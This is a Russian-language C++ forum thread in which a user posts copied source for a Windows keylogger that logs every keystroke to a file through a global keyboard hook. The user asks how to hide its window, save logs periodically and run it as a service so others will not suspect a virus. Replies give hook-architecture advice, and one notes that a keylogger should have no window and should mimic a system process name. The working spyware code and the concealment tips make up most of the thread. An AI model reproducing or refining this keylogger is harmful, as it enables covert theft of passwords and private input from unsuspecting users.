Форум программистов, компьютерный форум, киберфорум
Наши страницы

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
Рейтинг: Рейтинг темы: голосов - 10, средняя оценка - 4.60
124bit
0 / 0 / 0
Регистрация: 06.12.2009
Сообщений: 17
#1

заменить MessageBox на ... - C++

06.12.2009, 01:00. Просмотров 1440. Ответов 5
Метки нет (Все метки)

C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#define _WIN32_WINNT 0x0500
 
 
#include<fstream>
#include<windows.h>
#include<iostream>
using namespace std;
 
ofstream out("keys.txt", ios::out);
 
LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) 
        {  
    PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);
        // If key is being pressed
    if (wParam == WM_KEYDOWN) {
        switch (p->vkCode) {
 
            // Invisible keys
            case VK_CAPITAL:    out << "<CAPLOCK>";     break;
            case VK_SHIFT:      out << "<SHIFT>";       break;
            case VK_LCONTROL:   out << "<LCTRL>";       break;
            case VK_RCONTROL:   out << "<RCTRL>";       break;
            case VK_INSERT:     out << "<INSERT>";      break;
            case VK_END:        out << "<END>";         break;
            case VK_PRINT:      out << "<PRINT>";       break;
            case VK_DELETE:     out << "<DEL>";         break;
            case VK_BACK:       out << "<BK>";          break;
 
            case VK_LEFT:       out << "<LEFT>";        break;
            case VK_RIGHT:      out << "<RIGHT>";       break;
            case VK_UP:         out << "<UP>";          break;
            case VK_DOWN:       out << "<DOWN>";        break;
 
            // Visible keys
            default:
                out << char(tolower(p->vkCode));
 
                          }
                              }
 
    return CallNextHookEx(NULL, nCode, wParam, lParam);
       }    
 
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {
 
    // Set windows hook
    HHOOK keyboardHook = SetWindowsHookEx(
        WH_KEYBOARD_LL,
        keyboardHookProc,
        hInstance,
        0);
    MessageBox(NULL, "Press OK to stop logging.", "Information", MB_OK);
 
    out.close();
 
    return 0;
}

это скатанные кейлоггер.. Именно си++ почти не знаю.

мне надо, чтоб он сохранял нажатия клавиш не после нажатия кнопки ок в окне, а перед выключением компа или каждые 10 мин, и так и так, а окно вообще чтоб не вылазило)).
Никак не могу понять, как это замутить. Если окно заменить на бесконечный цикл - проц сильно загружен становиться, если на слип - программа вообще не работает((
помогите, пожалуйста

Добавлено через 3 минуты
и еще вопрос... зачем вот эта строка
#define _WIN32_WINNT 0x0500
?

Добавлено через 13 минут
ии еще вопрос.. как эту глупость сделать сервисом, если это не сложно,?
ато достали с вопросами, *чего это такое там в процессах блин.. не вирус ли?*

Добавлено через 14 секунд
ии еще вопрос.. как эту глупость сделать сервисом, если это не сложно,?
ато достали с вопросами, *чего это такое там в процессах блин.. не вирус ли?*
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
06.12.2009, 01:00
Здравствуйте! Я подобрал для вас темы с ответами на вопрос заменить MessageBox на ... (C++):

MessageBox - C++
#include &quot;stdafx.h&quot; #include &lt;windows.h&gt; void main() { MessageBox(0,L&quot;Лалалал&quot;,L&quot;Ололо&quot;, MB_OK); } Здравствуйте.Есть...

MessageBox - C++
Int COUNT=20; MessageBox(NULL, COUNT + L&quot; очков. &quot;, L&quot;Title &quot;, MB_OK); Почему не выводит значение переменной COUNT в окне...

messagebox() - C++
нужно из массива вывести данные в окно messagebox #include &quot;stdafx.h&quot; #include &quot;windows.h&quot; int WINAPI WinMain(HINSTANCE,...

MessageBox API - C++
MessageBox API: не получаеться обработать выбор. Мой код: int SELECT = MessageBox(hwnd, _T(&quot;Вы действительно хотите завершить работу...

MessageBox ошибка - C++
Бред какой-то..... Компилирую код и выдает ошибки. CodeWarrior 7.0. C++. //12.1 - The Message Box Program - Mark Lee - Prima...

Не работает MessageBox - C++
Не работает след строчка MessageBox(&quot;Test&quot;); Выдает ошибку error C2664: 'MessageBoxW' : cannot convert parameter 1 from 'char '...

5
fasked
Эксперт С++
4948 / 2528 / 180
Регистрация: 07.10.2009
Сообщений: 4,311
Записей в блоге: 1
06.12.2009, 01:05 #2
#define _WIN32_WINNT 0x0500
Данная строка задает операционную систему Windows 2000. Другими допустимыми значениями являются 0x0501 для Windows XP, 0x0502 для Windows Server 2003 и 0x0600 для Windows Vista.
0
124bit
0 / 0 / 0
Регистрация: 06.12.2009
Сообщений: 17
06.12.2009, 01:23  [ТС] #3
угу, пасиба.. я так и думал))) а...
0
CyBOSSeR
Эксперт С++
2304 / 1674 / 86
Регистрация: 06.03.2009
Сообщений: 3,675
06.12.2009, 01:27 #4
Кейлогер обычно состоит из 2-х частей:
DLL, содержащая процедуру обработки, скажем так, сообщений от клавиатуры (в твоем случае это функция keyboardHookProc).
Исполняемый модуль, осуществляющий установку хука на клавиатуру посредством вызова SetWindowsHookEx и возможно его удаляющий.

У тебя же сейчас все в одном исполняемом модуле.

Помести код keyboardHookProc в DLL, исполняемый модуль будет просто вызывать SetWindowsHookEx в нужное и на нужное тебе время.
0
M128K145
Эксперт С++
8297 / 3517 / 143
Регистрация: 03.07.2009
Сообщений: 10,706
06.12.2009, 18:10 #5
Цитата Сообщение от 124bit Посмотреть сообщение
чтоб он сохранял нажатия клавиш не после нажатия кнопки ок в окне
а какое окно может быть у кейлоггера???
124bit, простейший кейлоггер можно написать максимум за полдня. Какой смысл качать откуда-то какой-то сомнительный кривой код да и при этом называть его кейлоггером?? Сам хоть раз видел кейлоггер? Вряд ли. Потому что:
а) окна у него нету, просто висит процесс
б) имя процесса как минимум должно совпадать с именем любого системного процесса
в) пункт б истинен только для работы на машинах ламеров

CyBOSSeR, нормальный хук кажется только в длл и может быть
0
CyBOSSeR
Эксперт С++
2304 / 1674 / 86
Регистрация: 06.03.2009
Сообщений: 3,675
06.12.2009, 20:09 #6
M128K145, если хук предназначен для перехвата сообщений от всех потоков системы - то только в DLL.
Хук ведь можно поставить только на определенный поток своего же процесса, тогда его местоположение не суть важно.
0
06.12.2009, 20:09
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
06.12.2009, 20:09
Привет! Вот еще темы с ответами:

Закрытия MessageBox - C++
Добрый день как программно можно закрыть окно MessageBox без нажатия кнопки OK

трабла с MessageBox - C++
Вот такая вот задачка сначала задается текст в ANSI ,затем его конвертируем в UNICODE и должны вывести его 3 способами - через _tprintf ,...

Вывод messagebox - C++
Необходимо вывести сообщение в messagebox,после выоа программа должна работать недожидаясь никаких действий,как это реолизовать

Не выводится messagebox в MFC - C++
Доброго времени суток, Вопрос такой: я создал MFC-проект (на основе диалоговых окон), в котором сделал меню. Другое диалоговое...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
6
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Рейтинг@Mail.ru